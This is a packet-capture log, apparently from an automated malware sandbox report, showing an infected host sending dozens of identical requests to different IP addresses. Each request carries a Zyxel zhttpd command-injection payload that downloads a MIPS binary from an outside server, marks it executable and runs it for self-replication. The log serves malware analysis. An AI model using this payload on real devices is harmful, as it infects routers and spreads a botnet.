                                    Jan 13, 2024 19:02:53.639555931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9262192.168.2.1354196128.225.255.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639609098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9263192.168.2.134311259.18.47.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639703035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9264192.168.2.135547272.56.51.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639765024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9265192.168.2.1333070132.227.149.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639799118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9266192.168.2.1349808103.221.90.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639849901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9267192.168.2.133659861.176.196.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639909029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9268192.168.2.1353396116.198.154.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639966011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9269192.168.2.135986275.0.71.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640028000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9270192.168.2.1339082184.148.181.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640080929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9271192.168.2.135178293.87.225.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640153885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9272192.168.2.135664635.166.157.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640196085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9273192.168.2.1344678129.242.200.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640281916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9274192.168.2.1345538139.108.213.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640340090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9275192.168.2.134272642.0.122.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640413046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9276192.168.2.133867286.104.39.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640476942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9277192.168.2.1341648170.142.243.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640530109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9278192.168.2.1347036114.62.49.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640578985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9279192.168.2.1340240160.228.249.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640633106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9280192.168.2.135110825.11.50.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640711069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9281192.168.2.1344670170.179.168.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640784025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9282192.168.2.135858665.158.236.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640830040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9283192.168.2.1350020117.55.93.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640872955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9284192.168.2.1360916190.55.200.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.640959024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9285192.168.2.1342606199.95.212.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641026020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9286192.168.2.1356190104.71.31.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641062975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9287192.168.2.1350786106.70.45.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641140938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9288192.168.2.1349404162.70.247.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641218901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9289192.168.2.1343990126.46.138.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641253948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9290192.168.2.1350054195.45.209.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641302109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9291192.168.2.136041882.47.199.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641334057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9292192.168.2.135123018.181.102.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641381979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9293192.168.2.1360252100.129.146.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641455889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9294192.168.2.133917259.239.235.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641522884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9295192.168.2.135991027.22.247.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641561031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9296192.168.2.1352878107.68.252.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641622066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9297192.168.2.135561899.214.129.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641679049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9298192.168.2.1345010148.146.172.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641736031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9299192.168.2.134099240.189.1.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641777992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9300192.168.2.135336291.236.43.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641844988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9301192.168.2.13463525.187.112.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641916990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9302192.168.2.134560225.202.1.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.641972065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9303192.168.2.135239476.174.134.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642030001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9304192.168.2.1343922126.89.100.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642091036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9305192.168.2.1338494156.202.51.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642141104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9306192.168.2.13527841.5.72.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642180920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9307192.168.2.1353692101.61.23.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642273903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9308192.168.2.1355520221.219.104.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642317057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9309192.168.2.1347802190.44.59.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642370939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9310192.168.2.1333480117.123.142.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642422915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9311192.168.2.1350866192.165.198.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642488956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9312192.168.2.134860636.197.167.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642517090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9313192.168.2.1338844219.204.152.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642580986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9314192.168.2.135937644.91.104.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642621994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9315192.168.2.133448040.43.182.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642693996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9316192.168.2.134302413.199.145.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642741919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9317192.168.2.135342497.231.126.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642812014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9318192.168.2.135192017.149.172.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642872095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9319192.168.2.135529848.177.25.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.642935038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9320192.168.2.13464462.153.172.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643016100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9321192.168.2.136008037.155.46.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643079042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9322192.168.2.1359650185.196.72.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643150091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9323192.168.2.134028452.187.29.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643196106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9324192.168.2.1358842116.127.112.31443
                                    TimestampBytes transferredDirectionData
